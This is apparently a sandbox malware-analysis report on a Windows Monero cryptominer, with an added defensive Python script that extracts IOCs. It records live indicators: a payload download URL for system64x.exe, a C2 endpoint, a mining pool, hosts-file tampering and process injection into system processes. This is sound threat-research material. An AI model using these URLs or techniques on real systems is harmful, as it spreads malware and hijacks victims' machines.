Source: SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, 00000001.00000002.2401131352.0000000003353000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, 00000001.00000002.2401131352.0000000003467000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com
Source: SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, 00000001.00000002.2401131352.000000000348F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com(
Source: SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, 00000001.00000002.2401131352.00000000028E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/231d23EDD3dwedf234fdew223df23wqf/wef4t43gf34f4g4gfefwg4gfwfgehet5hsrtjrjefswf/blo
Source: SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, 00000001.00000002.2401131352.000000000348F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/231d23EDD3dwedf234fdew223df23wqf/wef4t43gf34f4g4gfefwg4gfwfgehet5hsrtjrjefswf/raw
Source: SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, 00000001.00000002.2401131352.00000000028E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, 00000001.00000002.2412690299.000000001272F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, 00000001.00000002.2401131352.00000000034EB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com
Source: SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, 00000001.00000002.2401131352.00000000034EB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com/231d23EDD3dwedf234fdew223df23wqf/wef4t43gf34f4g4gfefwg4gfwfgehet5h
Source: dialer.exe, 0000002F.00000002.3603906840.0000025545E25000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 0000002F.00000003.2470280295.0000025545EAD000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 0000002F.00000003.3053963293.0000025545EA9000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 0000002F.00000002.3605895268.0000025545EAE000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 0000002F.00000003.3054668059.0000025545EAD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://wea9ufgh438790atrhjwiujngzhe4wa709rthjcwa9nv8n980avw.roast247.eu.org/api/endpoint.php
Source: dialer.exe, 0000002F.00000002.3603906840.0000025545E25000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://wea9ufgh438790atrhjwiujngzhe4wa709rthjcwa9nv8n980avw.roast247.eu.org/api/endpoint.php--cinit
Source: dialer.exe, 0000002F.00000002.3586212031.0000000140001000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: https://xmrig.com/docs/algorithms
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:49727 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.5:49729 version: TLS 1.2
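The network findings above are a flattened table: the source cell, the finding and the HTTP request headers ran together in extraction. The Python below is an added example, not part of the Joe Sandbox report, that parses lines in the restored form and pulls out what a responder would block or hunt for: the DNS names, the remote endpoint on the unusual port, the payload URL on raw.githubusercontent.com and the custom beacon User-Agent. The sample lines are copied from this report's own network section with the cell boundaries restored; the classification rules (treating moneroocean.stream as a mining pool, any remote port other than 53/80/443 at or above 1024 as Stratum-style, a cpp-httplib User-Agent as a hand-rolled beacon) are assumptions of this example and are not something the report states.

```python
"""Extract and classify network IOCs from Joe Sandbox-style 'Source: ...' lines.

Added example (not from the report). SAMPLE_LINES are copied from the report's
network section with the flattened table cells separated by hand; the
classification rules below are assumptions, not the sandbox's own logic.
"""
import re
from dataclasses import dataclass, field

# Constructed from the report's own lines (cell boundaries restored by hand).
SAMPLE_LINES = [
    "Source: global traffic TCP traffic: 192.168.2.5:49734 -> 149.102.143.109:10128",
    "Source: global traffic HTTP traffic detected: GET /231d23EDD3dwedf234fdew223df23wqf/"
    "wef4t43gf34f4g4gfefwg4gfwfgehet5hsrtjrjefswf/main/system64x.exe HTTP/1.1"
    " | Host: raw.githubusercontent.com | Connection: Keep-Alive",
    "Source: global traffic DNS traffic detected: DNS query: gulf.moneroocean.stream",
    "Source: global traffic DNS traffic detected: DNS query: "
    "wea9ufgh438790atrhjwiujngzhe4wa709rthjcwa9nv8n980avw.roast247.eu.org",
    "Source: unknown HTTP traffic detected: POST /api/endpoint.php HTTP/1.1 | Accept: */*"
    " | Connection: close | Content-Length: 487 | Content-Type: application/json"
    " | Host: wea9ufgh438790atrhjwiujngzhe4wa709rthjcwa9nv8n980avw.roast247.eu.org"
    " | User-Agent: cpp-httplib/0.12.6",
    "Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:49729 version: TLS 1.2",
]

# Assumptions: pool domain suffixes treated as miner infrastructure, and the
# analysis VM's subnet used to decide which side of a flow is "remote".
KNOWN_POOL_SUFFIXES = ("moneroocean.stream",)
LOCAL_NET = "192.168.2."
BENIGN_PORTS = {53, 80, 443}

TCP_RE = re.compile(r"(\d+\.\d+\.\d+\.\d+):(\d+) -> (\d+\.\d+\.\d+\.\d+):(\d+)")
REQ_RE = re.compile(r"\b(GET|POST) (\S+) HTTP/1\.[01]")
HDR_RE = re.compile(r"\| ([A-Za-z-]+): ([^|]+?)(?= \||$)")
DNS_RE = re.compile(r"DNS query: (\S+)")


@dataclass
class Iocs:
    domains: set = field(default_factory=set)
    remote_endpoints: set = field(default_factory=set)  # "ip:port"
    urls: set = field(default_factory=set)              # "host/path"
    user_agents: set = field(default_factory=set)
    findings: list = field(default_factory=list)        # human-readable verdicts


def parse_lines(lines):
    """Walk report lines once and collect IOCs plus rule hits."""
    iocs = Iocs()
    for line in lines:
        m = TCP_RE.search(line)
        if m:
            src_ip, src_port, dst_ip, dst_port = m.groups()
            # Whichever side is not the analysis VM is the remote endpoint.
            remote = (f"{dst_ip}:{dst_port}" if src_ip.startswith(LOCAL_NET)
                      else f"{src_ip}:{src_port}")
            iocs.remote_endpoints.add(remote)
            port = int(remote.rsplit(":", 1)[1])
            if port >= 1024 and port not in BENIGN_PORTS:
                iocs.findings.append(
                    f"non-standard high port {remote} (Stratum-style miner traffic?)")
        m = DNS_RE.search(line)
        if m:
            name = m.group(1)
            iocs.domains.add(name)
            if name.endswith(KNOWN_POOL_SUFFIXES):
                iocs.findings.append(f"known Monero pool domain {name}")
        m = REQ_RE.search(line)
        if m:
            path = m.group(2)
            headers = {k.lower(): v.strip() for k, v in HDR_RE.findall(line)}
            host = headers.get("host", "")
            iocs.urls.add(f"{host}{path}")
            ua = headers.get("user-agent")
            if ua:
                iocs.user_agents.add(ua)
                if ua.startswith("cpp-httplib/"):
                    iocs.findings.append(f"cpp-httplib beacon to {host}")
            if host == "raw.githubusercontent.com" and path.endswith(".exe"):
                iocs.findings.append(f"PE payload download from {host}{path}")
    return iocs


if __name__ == "__main__":
    result = parse_lines(SAMPLE_LINES)
    for f in result.findings:
        print("FINDING:", f)
    print("block:", sorted(result.domains | result.remote_endpoints))
```

The direction check matters: Joe Sandbox prints the HTTPS line server-first (`140.82.121.3:443 -> 192.168.2.5:49729`) but the plain TCP line client-first, so a parser that always takes the right-hand side would report the VM's ephemeral port as the remote endpoint.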

                      Spam, unwanted Advertisements and Ransom Demands

Source: C:\Windows\SysWOW64\system64x.exe File written: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System

                      Operating System Destruction

Source: C:\ProgramData\Google\Chrome\updater.exe Process information set: 01 00 00 00
Source: C:\ProgramData\Google\Chrome\updater.exe Process information set: 01 00 00 00

                      System Summary

                      Source: 47.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                      Source: 47.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                      Source: 47.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                      Source: 0000002F.00000002.3586212031.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                      Source: Process Memory Space: SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe PID: 612, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                      Source: Process Memory Space: dialer.exe PID: 7780, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                      Source: C:\Windows\SysWOW64\system64x.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                      Source: C:\Windows\SysWOW64\system64x.exeCode function: 3_2_00007FF762441394 NtCloseObjectAuditAlarm,3_2_00007FF762441394
                      Source: C:\Windows\System32\dialer.exeCode function: 17_2_00000001400010C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,FindCloseChangeNotification,CloseHandle,17_2_00000001400010C0
                      Source: C:\Windows\System32\winlogon.exeCode function: 22_2_000001E8589828C8 NtEnumerateValueKey,NtEnumerateValueKey,22_2_000001E8589828C8
                      Source: C:\Windows\System32\lsass.exeCode function: 31_2_00000140AE86202C NtQuerySystemInformation,StrCmpNIW,31_2_00000140AE86202C
                      Source: C:\Windows\System32\lsass.exeCode function: 31_2_00000140AE86253C NtQueryDirectoryFileEx,GetFileType,StrCpyW,31_2_00000140AE86253C
                      Source: C:\Windows\System32\dwm.exeCode function: 33_2_000001160CA928C8 NtEnumerateValueKey,NtEnumerateValueKey,33_2_000001160CA928C8
                      Source: C:\Windows\System32\dialer.exeCode function: 44_2_00000001400010C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,FindCloseChangeNotification,CloseHandle,44_2_00000001400010C0
                      Source: C:\Windows\System32\dialer.exeCode function: 45_2_0000000140001394 NtFlushVirtualMemory,45_2_0000000140001394
                      Source: C:\Windows\System32\wbem\WMIADAP.exeCode function: 53_2_0000028708E6202C NtQuerySystemInformation,StrCmpNIW,53_2_0000028708E6202C
                      Source: C:\Windows\System32\wbem\WMIADAP.exeCode function: 53_2_0000028708E6253C NtQueryDirectoryFileEx,GetFileType,StrCpyW,53_2_0000028708E6253C
                      Source: C:\ProgramData\Google\Chrome\updater.exeFile created: C:\Windows\TEMP\voeeoiqrjnla.sys
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeFile created: C:\Windows\SysWOW64\system64x.exe
                      Source: C:\Windows\System32\wbem\WMIADAP.exeFile created: C:\Windows\system32\wbem\Performance\WmiApRpl_new.h
                      Source: C:\Windows\System32\wbem\WMIADAP.exeFile created: C:\Windows\system32\wbem\Performance\WmiApRpl_new.ini
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile deleted: C:\Windows\Temp\__PSScriptPolicyTest_mkmwtu32.fhp.ps1
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeCode function: 1_2_00007FF848AD09B21_2_00007FF848AD09B2
                      Source: C:\Windows\SysWOW64\system64x.exeCode function: 3_2_00007FF762443F703_2_00007FF762443F70
                      Source: C:\Windows\System32\dialer.exeCode function: 17_2_000000014000226C17_2_000000014000226C
                      Source: C:\Windows\System32\dialer.exeCode function: 17_2_00000001400014D817_2_00000001400014D8
                      Source: C:\Windows\System32\dialer.exeCode function: 17_2_000000014000256017_2_0000000140002560
                      Source: C:\Windows\System32\winlogon.exeCode function: 22_2_000001E858951F2C22_2_000001E858951F2C
                      Source: C:\Windows\System32\winlogon.exeCode function: 22_2_000001E8589638A822_2_000001E8589638A8
                      Source: C:\Windows\System32\winlogon.exeCode function: 22_2_000001E85895D0E022_2_000001E85895D0E0
                      Source: C:\Windows\System32\winlogon.exeCode function: 22_2_000001E858982B2C22_2_000001E858982B2C
                      Source: C:\Windows\System32\winlogon.exeCode function: 22_2_000001E8589944A822_2_000001E8589944A8
                      Source: C:\Windows\System32\winlogon.exeCode function: 22_2_000001E85898DCE022_2_000001E85898DCE0
                      Source: C:\Windows\System32\winlogon.exeCode function: 22_2_000001E8589B1F2C22_2_000001E8589B1F2C
                      Source: C:\Windows\System32\winlogon.exeCode function: 22_2_000001E8589C38A822_2_000001E8589C38A8
                      Source: C:\Windows\System32\winlogon.exeCode function: 22_2_000001E8589BD0E022_2_000001E8589BD0E0
                      Source: C:\ProgramData\Google\Chrome\updater.exeCode function: 28_2_00007FF72AF23F7028_2_00007FF72AF23F70
                      Source: C:\Windows\System32\lsass.exeCode function: 31_2_00000140ADFC1F2C31_2_00000140ADFC1F2C
                      Source: C:\Windows\System32\lsass.exeCode function: 31_2_00000140ADFCD0E031_2_00000140ADFCD0E0
                      Source: C:\Windows\System32\lsass.exeCode function: 31_2_00000140ADFD38A831_2_00000140ADFD38A8
                      Source: C:\Windows\System32\lsass.exeCode function: 31_2_00000140AE86DCE031_2_00000140AE86DCE0
                      Source: C:\Windows\System32\lsass.exeCode function: 31_2_00000140AE8744A831_2_00000140AE8744A8
                      Source: C:\Windows\System32\lsass.exeCode function: 31_2_00000140AE862B2C31_2_00000140AE862B2C
                      Source: C:\Windows\System32\svchost.exeCode function: 32_2_00000195DD59D0E032_2_00000195DD59D0E0
                      Source: C:\Windows\System32\svchost.exeCode function: 32_2_00000195DD5A38A832_2_00000195DD5A38A8
                      Source: C:\Windows\System32\svchost.exeCode function: 32_2_00000195DD591F2C32_2_00000195DD591F2C
                      Source: C:\Windows\System32\svchost.exeCode function: 32_2_00000195DD5CDCE032_2_00000195DD5CDCE0
                      Source: C:\Windows\System32\svchost.exeCode function: 32_2_00000195DD5D44A832_2_00000195DD5D44A8
                      Source: C:\Windows\System32\svchost.exeCode function: 32_2_00000195DD5C2B2C32_2_00000195DD5C2B2C
                      Source: C:\Windows\System32\dwm.exeCode function: 33_2_000001160CA61F2C33_2_000001160CA61F2C
                      Source: C:\Windows\System32\dwm.exeCode function: 33_2_000001160CA6D0E033_2_000001160CA6D0E0
                      Source: C:\Windows\System32\dwm.exeCode function: 33_2_000001160CA738A833_2_000001160CA738A8
                      Source: C:\Windows\System32\dwm.exeCode function: 33_2_000001160CA92B2C33_2_000001160CA92B2C
                      Source: C:\Windows\System32\dwm.exeCode function: 33_2_000001160CA9DCE033_2_000001160CA9DCE0
                      Source: C:\Windows\System32\dwm.exeCode function: 33_2_000001160CAA44A833_2_000001160CAA44A8
                      Source: C:\Windows\System32\dialer.exeCode function: 44_2_000000014000226C44_2_000000014000226C
                      Source: C:\Windows\System32\dialer.exeCode function: 44_2_00000001400014D844_2_00000001400014D8
                      Source: C:\Windows\System32\dialer.exeCode function: 44_2_000000014000256044_2_0000000140002560
                      Source: C:\Windows\System32\dialer.exeCode function: 45_2_000000014000316045_2_0000000140003160
                      Source: C:\Windows\System32\dialer.exeCode function: 45_2_00000001400026E045_2_00000001400026E0
                      Source: C:\Windows\System32\svchost.exeCode function: 48_2_00000257E10838A848_2_00000257E10838A8
                      Source: C:\Windows\System32\svchost.exeCode function: 48_2_00000257E107D0E048_2_00000257E107D0E0
                      Source: C:\Windows\System32\svchost.exeCode function: 48_2_00000257E1071F2C48_2_00000257E1071F2C
                      Source: C:\Windows\System32\svchost.exeCode function: 48_2_00000257E10B44A848_2_00000257E10B44A8
                      Source: C:\Windows\System32\svchost.exeCode function: 48_2_00000257E10ADCE048_2_00000257E10ADCE0
                      Source: C:\Windows\System32\svchost.exeCode function: 48_2_00000257E10A2B2C48_2_00000257E10A2B2C
                      Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001F28C1E38A849_2_000001F28C1E38A8
                      Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001F28C1DD0E049_2_000001F28C1DD0E0
                      Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001F28C1D1F2C49_2_000001F28C1D1F2C
                      Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001F28C9444A849_2_000001F28C9444A8
                      Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001F28C93DCE049_2_000001F28C93DCE0
                      Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001F28C932B2C49_2_000001F28C932B2C
                      Source: C:\Windows\System32\svchost.exeCode function: 50_2_000001CA97FD1F2C50_2_000001CA97FD1F2C
                      Source: C:\Windows\System32\svchost.exeCode function: 50_2_000001CA97FDD0E050_2_000001CA97FDD0E0
                      Source: C:\Windows\System32\svchost.exeCode function: 50_2_000001CA97FE38A850_2_000001CA97FE38A8
                      Source: C:\Windows\System32\svchost.exeCode function: 50_2_000001CA98542B2C50_2_000001CA98542B2C
                      Source: C:\Windows\System32\svchost.exeCode function: 50_2_000001CA9854DCE050_2_000001CA9854DCE0
                      Source: C:\Windows\System32\svchost.exeCode function: 50_2_000001CA985544A850_2_000001CA985544A8
                      Source: C:\Windows\System32\svchost.exeCode function: 51_2_000001D2652F38A851_2_000001D2652F38A8
                      Source: C:\Windows\System32\svchost.exeCode function: 51_2_000001D2652ED0E051_2_000001D2652ED0E0
                      Source: C:\Windows\System32\svchost.exeCode function: 51_2_000001D2652E1F2C51_2_000001D2652E1F2C
                      Source: C:\Windows\System32\svchost.exeCode function: 51_2_000001D2653244A851_2_000001D2653244A8
                      Source: C:\Windows\System32\svchost.exeCode function: 51_2_000001D26531DCE051_2_000001D26531DCE0
                      Source: C:\Windows\System32\svchost.exeCode function: 51_2_000001D26532AEC251_2_000001D26532AEC2
                      Source: C:\Windows\System32\svchost.exeCode function: 51_2_000001D265312B2C51_2_000001D265312B2C
                      Source: C:\Windows\System32\svchost.exeCode function: 52_2_00000254A27D2B2C52_2_00000254A27D2B2C
                      Source: C:\Windows\System32\svchost.exeCode function: 52_2_00000254A27E44A852_2_00000254A27E44A8
                      Source: C:\Windows\System32\svchost.exeCode function: 52_2_00000254A27DDCE052_2_00000254A27DDCE0
                      Source: C:\Windows\System32\wbem\WMIADAP.exeCode function: 53_2_0000028708E31F2C53_2_0000028708E31F2C
                      Source: C:\Windows\System32\wbem\WMIADAP.exeCode function: 53_2_0000028708E3D0E053_2_0000028708E3D0E0
                      Source: C:\Windows\System32\wbem\WMIADAP.exeCode function: 53_2_0000028708E438A853_2_0000028708E438A8
                      Source: C:\Windows\System32\wbem\WMIADAP.exeCode function: 53_2_0000028708E62B2C53_2_0000028708E62B2C
                      Source: C:\Windows\System32\wbem\WMIADAP.exeCode function: 53_2_0000028708E6DCE053_2_0000028708E6DCE0
                      Source: C:\Windows\System32\wbem\WMIADAP.exeCode function: 53_2_0000028708E744A853_2_0000028708E744A8
                      Source: C:\Windows\System32\svchost.exeCode function: 54_2_0000024B87DDDCE054_2_0000024B87DDDCE0
                      Source: C:\Windows\System32\svchost.exeCode function: 54_2_0000024B87DE44A854_2_0000024B87DE44A8
                      Source: C:\Windows\System32\svchost.exeCode function: 54_2_0000024B87DD2B2C54_2_0000024B87DD2B2C
                      Source: C:\Windows\System32\svchost.exeCode function: 55_2_00000205FB3CD0E055_2_00000205FB3CD0E0
                      Source: C:\Windows\System32\svchost.exeCode function: 55_2_00000205FB3D38A855_2_00000205FB3D38A8
                      Source: C:\Windows\System32\svchost.exeCode function: 55_2_00000205FB3C1F2C55_2_00000205FB3C1F2C
                      Source: C:\Windows\System32\svchost.exeCode function: 55_2_00000205FD402B2C55_2_00000205FD402B2C
                      Source: C:\Windows\System32\svchost.exeCode function: 55_2_00000205FD4144A855_2_00000205FD4144A8
                      Source: C:\Windows\System32\svchost.exeCode function: 55_2_00000205FD40DCE055_2_00000205FD40DCE0
                      Source: C:\Windows\System32\svchost.exeCode function: 56_2_000001A2056A2B2C56_2_000001A2056A2B2C
                      Source: C:\Windows\System32\svchost.exeCode function: 56_2_000001A2056ADCE056_2_000001A2056ADCE0
                      Source: C:\Windows\System32\svchost.exeCode function: 56_2_000001A2056B44A856_2_000001A2056B44A8
                      Source: C:\Windows\System32\svchost.exeCode function: 57_2_0000018EC1F3D0E057_2_0000018EC1F3D0E0
                      Source: C:\Windows\System32\svchost.exeCode function: 57_2_0000018EC1F438A857_2_0000018EC1F438A8
                      Source: C:\Windows\System32\svchost.exeCode function: 57_2_0000018EC1F31F2C57_2_0000018EC1F31F2C
                      Source: C:\Windows\System32\svchost.exeCode function: 57_2_0000018EC1F6DCE057_2_0000018EC1F6DCE0
                      Source: C:\Windows\System32\svchost.exeCode function: 57_2_0000018EC1F744A857_2_0000018EC1F744A8
                      Source: C:\Windows\System32\svchost.exeCode function: 57_2_0000018EC1F62B2C57_2_0000018EC1F62B2C
                      Source: C:\Windows\System32\svchost.exeCode function: 58_2_0000025CE3BCD0E058_2_0000025CE3BCD0E0
                      Source: C:\Windows\System32\svchost.exeCode function: 58_2_0000025CE3BD38A858_2_0000025CE3BD38A8
                      Source: C:\Windows\System32\svchost.exeCode function: 58_2_0000025CE3BC1F2C58_2_0000025CE3BC1F2C
                      Source: C:\Windows\System32\svchost.exeCode function: 58_2_0000025CE3E0DCE058_2_0000025CE3E0DCE0
                      Source: C:\Windows\System32\svchost.exeCode function: 58_2_0000025CE3E144A858_2_0000025CE3E144A8
                      Source: C:\Windows\System32\svchost.exeCode function: 58_2_0000025CE3E02B2C58_2_0000025CE3E02B2C
                      Source: Joe Sandbox ViewDropped File: C:\Windows\Temp\voeeoiqrjnla.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                      Source: C:\ProgramData\Google\Chrome\updater.exeCode function: String function: 00007FF72AF21394 appears 34 times
                      Source: C:\Windows\SysWOW64\system64x.exeCode function: String function: 00007FF762441394 appears 34 times
                      Source: SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, 00000001.00000000.2235289313.00000000003EC000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilename1Document.exe4 vs SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe
                      Source: SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, 00000001.00000002.2401131352.00000000026B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe
                      Source: SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, 00000001.00000002.2401131352.0000000002725000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe
                      Source: SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 47.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                      Source: 47.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                      Source: 47.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                      Source: 0000002F.00000002.3586212031.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                      Source: Process Memory Space: SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe PID: 612, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                      Source: Process Memory Space: dialer.exe PID: 7780, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                      Source: SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, MainApp.csBase64 encoded string: '…'
                      Source: classification engineClassification label: mal100.adwa.spyw.evad.mine.winEXE@65/86@4/4
                      Source: C:\Windows\System32\dialer.exeCode function: 17_2_000000014000226C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,FindResourceA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,17_2_000000014000226C
                      Source: C:\Windows\System32\dialer.exeCode function: 44_2_000000014000226C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,FindResourceA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,44_2_000000014000226C
